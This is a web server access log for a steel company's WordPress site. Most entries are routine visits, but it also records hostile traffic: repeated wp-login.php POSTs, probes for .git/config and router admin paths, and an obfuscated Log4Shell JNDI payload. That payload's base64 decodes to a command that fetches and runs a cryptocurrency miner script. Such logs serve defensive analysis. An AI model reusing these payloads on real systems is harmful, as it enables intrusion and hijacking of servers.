111.7.100.26 - - [04/Oct/2025:21:07:59 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled.webp HTTP/1.1" 200 197360 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
36.133.115.36 - - [04/Oct/2025:21:09:48 +0800] "POST /wp-cron.php?doing_wp_cron=1759583388.3190670013427734375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:21:09:48 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
87.120.191.90 - - [04/Oct/2025:21:10:37 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Oct/2025:21:12:15 +0800] "POST /wp-cron.php?doing_wp_cron=1759583535.8356740474700927734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:21:12:15 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Oct/2025:21:14:49 +0800] "POST /wp-cron.php?doing_wp_cron=1759583689.6482059955596923828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:21:14:49 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Oct/2025:21:17:22 +0800] "POST /wp-cron.php?doing_wp_cron=1759583842.9288868904113769531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:21:17:23 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Oct/2025:21:19:56 +0800] "POST /wp-cron.php?doing_wp_cron=1759583996.5771389007568359375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:21:19:56 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.99.136.131 - - [04/Oct/2025:21:20:50 +0800] "GET /portfolio-category/dual-phase-steel/ HTTP/1.1" 200 20860 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
36.133.115.36 - - [04/Oct/2025:21:21:47 +0800] "POST /wp-cron.php?doing_wp_cron=1759584107.3013770580291748046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.156 - - [04/Oct/2025:21:21:47 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
37.60.141.156 - - [04/Oct/2025:21:21:48 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
111.7.100.25 - - [04/Oct/2025:21:21:54 +0800] "GET /2162/ HTTP/1.1" 200 25352 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.26 - - [04/Oct/2025:21:21:54 +0800] "GET /2162/ HTTP/1.1" 200 25352 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.26 - - [04/Oct/2025:21:21:55 +0800] "GET /wp-content/uploads/2025/07/1753454299-Article_images_W900px-150x150.webp HTTP/1.1" 200 7416 "http://cqqizhou.com/2162/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.25 - - [04/Oct/2025:21:21:55 +0800] "GET /wp-content/uploads/2025/07/1753454089-Article_images_W900px.webp HTTP/1.1" 200 27552 "http://cqqizhou.com/2162/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.26 - - [04/Oct/2025:21:21:55 +0800] "GET /wp-content/uploads/2025/07/1753454089-Article_images_W900px-150x150.webp HTTP/1.1" 200 5292 "http://cqqizhou.com/2162/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.25 - - [04/Oct/2025:21:21:55 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/2162/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.26 - - [04/Oct/2025:21:21:55 +0800] "GET /wp-content/uploads/2025/07/1753410289-News2000%C3%97400_202571.webp HTTP/1.1" 200 17830 "http://cqqizhou.com/2162/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
165.154.38.157 - - [04/Oct/2025:21:22:30 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.99.136.135 - - [04/Oct/2025:21:22:42 +0800] "GET /portfolio-category/dual-phase-steel/ HTTP/1.1" 200 20860 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
36.99.136.132 - - [04/Oct/2025:21:22:46 +0800] "GET /wp-content/uploads/2025/07/1753410289-News2000%C3%97400_202571.webp HTTP/1.1" 200 17830 "http://cqqizhou.com/portfolio-category/dual-phase-steel/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
36.99.136.130 - - [04/Oct/2025:21:22:47 +0800] "GET /wp-content/uploads/2025/07/1753453096-%E5%8F%8C%E7%9B%B8%E9%92%A2product_Single600%C3%97284.webp HTTP/1.1" 200 14562 "http://cqqizhou.com/portfolio-category/dual-phase-steel/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
36.99.136.135 - - [04/Oct/2025:21:22:48 +0800] "GET /portfolio-category/dual-phase-steel/ HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
36.99.136.135 - - [04/Oct/2025:21:22:50 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/portfolio-category/dual-phase-steel/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
36.133.115.36 - - [04/Oct/2025:21:25:01 +0800] "POST /wp-cron.php?doing_wp_cron=1759584301.3096759319305419921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:21:25:01 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Oct/2025:21:27:31 +0800] "POST /wp-cron.php?doing_wp_cron=1759584451.3754060268402099609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:21:27:31 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
182.42.111.213 - - [04/Oct/2025:21:27:43 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
182.42.111.213 - - [04/Oct/2025:21:27:45 +0800] "GET / HTTP/1.1" 200 33467 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
111.7.100.25 - - [04/Oct/2025:21:28:33 +0800] "GET /portfolio-category/hot-dip-galvanized-coil/ HTTP/1.1" 200 20880 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.25 - - [04/Oct/2025:21:28:34 +0800] "GET /portfolio-category/hot-dip-galvanized-coil/ HTTP/1.1" 200 20880 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.27 - - [04/Oct/2025:21:28:35 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "http://cqqizhou.com/portfolio-category/hot-dip-galvanized-coil/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.25 - - [04/Oct/2025:21:28:35 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/portfolio-category/hot-dip-galvanized-coil/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.26 - - [04/Oct/2025:21:28:35 +0800] "GET /wp-content/uploads/2025/07/1753410289-News2000%C3%97400_202571.webp HTTP/1.1" 200 17830 "http://cqqizhou.com/portfolio-category/hot-dip-galvanized-coil/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
36.133.115.36 - - [04/Oct/2025:21:30:02 +0800] "POST /wp-cron.php?doing_wp_cron=1759584602.4061160087585449218750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:21:30:02 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Oct/2025:21:32:27 +0800] "POST /wp-cron.php?doing_wp_cron=1759584747.2592051029205322265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:21:32:27 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Oct/2025:21:35:26 +0800] "POST /wp-cron.php?doing_wp_cron=1759584926.0756928920745849609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:21:35:26 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Oct/2025:21:36:14 +0800] "POST /wp-cron.php?doing_wp_cron=1759584974.7480518817901611328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
49.51.233.95 - - [04/Oct/2025:21:36:14 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
49.51.233.95 - - [04/Oct/2025:21:36:17 +0800] "GET / HTTP/1.1" 200 33467 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Oct/2025:21:39:14 +0800] "POST /wp-cron.php?doing_wp_cron=1759585154.6473469734191894531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:21:39:14 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Oct/2025:21:41:59 +0800] "POST /wp-cron.php?doing_wp_cron=1759585319.1807820796966552734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:21:41:59 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Oct/2025:21:44:34 +0800] "POST /wp-cron.php?doing_wp_cron=1759585474.5132958889007568359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:21:44:34 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Oct/2025:21:47:14 +0800] "POST /wp-cron.php?doing_wp_cron=1759585634.1724510192871093750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:21:47:14 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Oct/2025:21:49:47 +0800] "POST /wp-cron.php?doing_wp_cron=1759585787.0534410476684570312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:21:49:47 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
34.38.83.65 - - [04/Oct/2025:21:49:58 +0800] "GET / HTTP/1.1" 301 5 "-" "python-requests/2.32.5"
36.133.115.36 - - [04/Oct/2025:21:52:26 +0800] "POST /wp-cron.php?doing_wp_cron=1759585945.9962320327758789062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:21:52:26 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Oct/2025:21:55:00 +0800] "POST /wp-cron.php?doing_wp_cron=1759586100.4706170558929443359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:21:55:00 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
87.120.191.90 - - [04/Oct/2025:21:55:30 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Oct/2025:21:57:36 +0800] "POST /wp-cron.php?doing_wp_cron=1759586256.7430429458618164062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:21:57:36 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Oct/2025:22:00:09 +0800] "POST /wp-cron.php?doing_wp_cron=1759586409.6394619941711425781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:22:00:09 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Oct/2025:22:02:44 +0800] "POST /wp-cron.php?doing_wp_cron=1759586564.9515628814697265625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:22:02:45 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Oct/2025:22:05:17 +0800] "POST /wp-cron.php?doing_wp_cron=1759586717.0322959423065185546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.99.136.130 - - [04/Oct/2025:22:05:17 +0800] "GET /contacts/ HTTP/1.1" 200 18531 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
165.154.38.157 - - [04/Oct/2025:22:05:17 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.99.136.134 - - [04/Oct/2025:22:06:54 +0800] "GET /contacts/ HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
36.133.115.36 - - [04/Oct/2025:22:06:54 +0800] "POST /wp-cron.php?doing_wp_cron=1759586814.3780479431152343750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [04/Oct/2025:22:07:51 +0800] "POST /wp-cron.php?doing_wp_cron=1759586871.5729279518127441406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:22:07:51 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Oct/2025:22:08:57 +0800] "POST /wp-cron.php?doing_wp_cron=1759586937.0198841094970703125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [04/Oct/2025:22:08:57 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Oct/2025:22:10:25 +0800] "POST /wp-cron.php?doing_wp_cron=1759587025.7948839664459228515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:22:10:25 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Oct/2025:22:12:54 +0800] "POST /wp-cron.php?doing_wp_cron=1759587174.1758511066436767578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:22:12:54 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
195.211.188.185 - - [04/Oct/2025:22:15:24 +0800] "GET / HTTP/1.1" 200 39369 "-" "Go-http-client/1.1"
36.133.115.36 - - [04/Oct/2025:22:15:37 +0800] "POST /wp-cron.php?doing_wp_cron=1759587337.1440699100494384765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:22:15:37 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Oct/2025:22:18:09 +0800] "POST /wp-cron.php?doing_wp_cron=1759587489.6601009368896484375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:22:18:09 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Oct/2025:22:21:07 +0800] "POST /wp-cron.php?doing_wp_cron=1759587667.2735459804534912109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.154.38.157 - - [04/Oct/2025:22:21:07 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Oct/2025:22:22:07 +0800] "POST /wp-cron.php?doing_wp_cron=1759587727.3179659843444824218750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [04/Oct/2025:22:22:07 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Oct/2025:22:24:57 +0800] "POST /wp-cron.php?doing_wp_cron=1759587897.3272819519042968750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.157.191.20 - - [04/Oct/2025:22:24:57 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.157.191.20 - - [04/Oct/2025:22:25:00 +0800] "GET / HTTP/1.1" 200 33466 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Oct/2025:22:33:23 +0800] "POST /wp-cron.php?doing_wp_cron=1759588403.6193621158599853515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.195.99 - - [04/Oct/2025:22:33:23 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Oct/2025:22:36:10 +0800] "POST /wp-cron.php?doing_wp_cron=1759588569.9958589076995849609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.90 - - [04/Oct/2025:22:36:10 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Oct/2025:22:36:53 +0800] "POST /wp-cron.php?doing_wp_cron=1759588613.4010488986968994140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.108.119 - - [04/Oct/2025:22:36:53 +0800] "HEAD / HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
36.133.115.36 - - [04/Oct/2025:22:46:45 +0800] "POST /wp-cron.php?doing_wp_cron=1759589205.4623389244079589843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
170.39.218.2 - - [04/Oct/2025:22:46:45 +0800] "GET / HTTP/1.1" 301 5 "-" "l9tcpid/v1.1.0"
170.39.218.2 - - [04/Oct/2025:22:46:46 +0800] "GET /.git/config HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
36.133.115.36 - - [04/Oct/2025:22:53:03 +0800] "POST /wp-cron.php?doing_wp_cron=1759589583.6207239627838134765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.156 - - [04/Oct/2025:22:53:04 +0800] "GET / HTTP/1.1" 200 151919 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
36.133.115.36 - - [04/Oct/2025:23:04:37 +0800] "POST /wp-cron.php?doing_wp_cron=1759590277.1433990001678466796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [04/Oct/2025:23:04:38 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
36.133.115.36 - - [04/Oct/2025:23:20:47 +0800] "POST /wp-cron.php?doing_wp_cron=1759591247.6599760055541992187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.90 - - [04/Oct/2025:23:20:47 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Oct/2025:23:23:34 +0800] "POST /wp-cron.php?doing_wp_cron=1759591414.5546879768371582031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [04/Oct/2025:23:23:34 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Oct/2025:23:31:26 +0800] "POST /wp-cron.php?doing_wp_cron=1759591886.8639531135559082031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
3.130.96.91 - - [04/Oct/2025:23:31:26 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [04/Oct/2025:23:34:02 +0800] "POST /wp-cron.php?doing_wp_cron=1759592042.2516980171203613281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
3.130.96.91 - - [04/Oct/2025:23:34:02 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [04/Oct/2025:23:39:31 +0800] "POST /wp-cron.php?doing_wp_cron=1759592370.9808380603790283203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
199.45.155.90 - - [04/Oct/2025:23:39:31 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.155.90 - - [04/Oct/2025:23:39:54 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
36.133.115.36 - - [04/Oct/2025:23:44:25 +0800] "POST /wp-cron.php?doing_wp_cron=1759592665.7856760025024414062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
180.249.55.19 - - [04/Oct/2025:23:44:30 +0800] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 31368 "-" "-"
36.133.115.36 - - [04/Oct/2025:23:47:02 +0800] "POST /wp-cron.php?doing_wp_cron=1759592822.3807649612426757812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
80.75.212.83 - - [04/Oct/2025:23:47:02 +0800] "GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==%7D%27%29 HTTP/1.1" 301 5 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')"
